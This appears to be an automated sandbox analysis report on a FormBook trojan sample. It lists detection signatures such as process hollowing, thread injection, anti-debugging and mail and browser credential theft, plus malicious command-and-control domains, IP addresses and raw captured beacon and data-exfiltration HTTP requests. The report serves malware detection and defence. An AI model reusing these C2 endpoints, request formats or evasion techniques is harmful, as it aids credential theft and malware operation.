Windows Analysis Report
u8QPnVhq0N.exe

Overview

General Information

Sample Name: u8QPnVhq0N.exe
Original Sample Name: 7de990046a20e6666627273589b014a5.exe
Analysis ID: 830804
MD5: 7de990046a20e6666627273589b014a5
SHA1: 55ebccd35c2329c5816cd0240b0919651ac58321
SHA256: ebce15ad53b98d7aba7f7544ee947e88f58d696e22ca4bc5d15b2ded37b577ac
Tags: 32exeFormbooktrojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: u8QPnVhq0N.exe ReversingLabs: Detection: 46%
Source: u8QPnVhq0N.exe Virustotal: Detection: 48% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm Avira URL Cloud: Label: malware
Source: http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iy Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.com Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/www.gritslab.com Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/www.white-hat.uk Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.com Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/www.222ambking.org Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/www.un-object.com Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/www.germanreps.com Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/www.younrock.com Avira URL Cloud: Label: malware
Source: http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pR Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyz Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe ReversingLabs: Detection: 33%
Machine Learning detection for sample
Source: u8QPnVhq0N.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.mcwfy.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.mcwfy.exe.2080000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: u8QPnVhq0N.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: u8QPnVhq0N.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Network Connect: 81.17.29.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 72.14.185.43 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.shapshit.xyz
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: A2HOSTINGUS A2HOSTINGUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 85.187.128.34 85.187.128.34
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 33 61 51 79 4e 64 34 6c 45 50 44 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR73aQyNd4lEPDvbt5YRg).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 77 48 43 72 70 42 7a 56 71 64 6e 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMIwHCrpBzVqdngPOgw6Q).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.energyservicestation.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.energyservicestation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyservicestation.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 42 47 68 31 55 6f 28 31 75 51 71 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tBGh1Uo(1uQqdntdDjQ).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.younrock.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.younrock.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.younrock.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 75 68 76 47 51 43 32 54 39 6e 64 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMuhvGQC2T9ndgRqvHVA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.thewildphotographer.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thewildphotographer.co.uk/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 7e 58 67 34 51 4b 48 7a 4d 43 6a 48 54 45 73 54 28 64 72 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzMCjHTEsT(dr1ZK9KUA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.shapshit.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.shapshit.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shapshit.xyz/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 56 66 52 78 77 52 51 41 62 39 68 53 34 69 67 43 61 62 55 4f 74 73 43 58 33 33 37 34 75 70 74 46 36 39 4a 35 4d 6c 6f 58 38 52 7e 61 54 43 34 79 43 55 59 6d 74 76 4f 59 54 30 43 77 77 6b 57 62 67 30 4e 56 77 59 62 34 7e 47 46 35 64 4f 36 41 56 59 74 5a 39 32 6b 78 63 42 54 62 54 50 69 76 48 63 4d 59 6b 54 72 72 78 4c 56 52 43 47 31 78 6a 77 73 31 76 30 6c 34 6d 5a 38 61 36 64 48 79 45 43 58 4a 4f 58 4a 77 4c 4a 53 48 63 44 34 34 75 70 72 76 4b 6d 79 73 73 36 28 50 45 48 45 72 59 6c 47 45 39 74 32 6e 67 58 30 58 4e 2d 50 33 52 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 